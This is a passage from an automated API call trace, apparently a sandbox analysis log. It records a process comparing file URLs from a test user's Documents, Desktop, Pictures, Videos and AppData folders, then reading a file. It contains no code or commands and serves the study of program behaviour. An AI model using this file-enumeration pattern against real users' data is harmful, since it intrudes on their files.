_String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/f-0yo_9neejgd78f.xlsx") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/mtgrgfodayrae.png") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3i2irr0cmclax.rtf") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ko7vfyuf_s9dmc.bmp") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/rca29ok1r73tia22zn.mkv") returned -1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qah0uzv-.ppt") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kapjdjpm0.gif") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/2owth4htj.pdf") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/1xfm.xlsx") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kfhuhsl.rtf") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/-53xiemee-e.docx") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ju_dzyrs7jfe4.pdf") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/ix0knq7j3.rtf") returned -1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/kipmxd08jtyra4.jpg") returned -1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/uegk7xbr6-krprckyd.docx") returned -1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/glvvvpveb1b9fqlag7.ots") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/nj1ua7qn.png") returned -1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/0swdp%200jtaygezojn.swf") returned -1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ra1qxhagr06tsse5srl.xlsx") returned -1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vtvzhju6h4lqxexi9ef9.jpg") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/l2ikfr.xlsx") returned -1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ed35v.mkv") returned -1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ysbwvdgi513gve8gdts0.swf") returned -1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/v27ythjhtm5zniry.ots") returned -1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg") returned -1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx") returned -1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png") returned -1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned -1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned -1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned 1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned -1 [0085.791] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned 1 [0085.792] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned -1 [0085.792] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned 1 [0085.792] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned -1 [0085.792] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned -1 [0085.792] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned -1 [0085.792] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned 1 [0085.792] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.792] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned 0 [0085.792] SetFilePointer (in: hFile=0xa0, lDistanceToMove=20736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5100 [0085.792] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.792] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.792] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.792] _strlwr (in: _Str=":Host: Computer" | out: _Str=":host: computer") returned=":host: computer" [0085.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr=":host: computer") returned 16 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8~1/desktop/sample_file.doc") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/o%201bunagzfik.flv") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4q6akwegf.mkv") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cs-nayun66m1kj0qh.flv") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/kdgk.docx") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/txcexlftylq2o.gif") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/lxcfr82x4aq4uswn.mkv") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/y0vxikbyowmim.gif") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/x-baj.mkv") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/gm13ifqvw%20o2ca5sqcfu.gif") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/crxv%20j7wkoocqrc.flv") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ggxj998_.flv") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/pvp12cuh1.mkv") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/hsii3%20s6wx.ots") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ivpbf2a6zwg8th8g0v.swf") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ym9tcvsa3hy3_sch.swf") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/ncgtsu2wgq6.bmp") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/yzvsri7wb0.pdf") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/nnkxqyu2c.bmp") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/cvm_.jpg") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/uwefm1na-dsdirw%20v7.bmp") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/saeibjk2.odp") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/pjm8g%20hd0vdm.docx") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/jbjbayjalmaqe.jpg") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/p0mmc6mktcpt8jz.ots") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/xqiysgiqzh.swf") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/shcj2ukhha9e2.png") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/0ivkoykeh0-af8.png") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/zwfvn9iebk6wzpag.mkv") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/v0ufl0ag.flv") returned -1 [0085.792] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/a3ne_yxum0cld.csv") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/6fshffojtwspry33.ppt") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/hby7gwij.doc") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/uhtkq-tczvm9tdvxvw.flv") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/28laxbsq3m50.jpg") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/xcj9p.jpg") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/gxv2c5bzmuai647pclru.xlsx") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/w5qvdpae9jrz.pdf") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/kvgo2ps.odt") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lu_nzwrgi2ssxtfhhhg.swf") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/c9v5cwhsfounz.png") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/g5ve1ybcahauz0t.gif") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/3sc0z1bfbrlsq.ppt") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ohxnykh_ufz4.gif") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/2n_gtpylh.odt") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/dc0kkkmref9xs.swf") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bbuhdsebor_wx0_ly.flv") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/neiwqsqwjb.docx") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/i-vzxxaq.ppt") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/s%201xjks5rgwiostrv.flv") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ie86ieikrrj2tctdthln.flv") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cthtm1stuuxwdzgs.swf") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/keqrajwwgkvsr.bmp") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/xad6dacxjlfsnkrl.mkv") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9zd4.pptx") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/uprrnkocaj.swf") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/ycpzmkirbkzdd83zh.pps") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bgq5sdc_j4q1pn3g.mkv") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/meivqh73.jpg") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/kfcaijye4jotjfgcvvz.docx") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/v8zjpd1uv_.bmp") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/7ulx.jpg") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/kpuzfgcfs9u.swf") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/olv5jdb-ffdifmwqcs.docx") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/rnvh3h9ck0e39pnq.pdf") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/mik5.xlsx") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/zqr7exbiokjx.mkv") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/gvvprgs0c.png") returned -1 [0085.793] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/bqip4gzdrig20x.png") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/imjmunevalj.bmp") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/kqayysruimuhur.gif") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/vw6xls.xlsx") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9wzlbboc.xlsx") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qu7qixvgbko.swf") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/8ep2zuetsnplh6gpu01.ots") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/j-fqx8oz1.flv") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/hkofn.rtf") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4-pa3_vg9kycz2coo.swf") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/dxixxj.gif") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/qcjka57cosu3vmhw1m.flv") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/6itn%20raypy3k4dh-lrq.bmp") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/khv7bwlacmmomab9eeg.odt") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/duzlmllyi_us.flv") returned -1 [0085.794] wcscmp (_String1=":host: computer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/auhiftr.pdf") returned -1 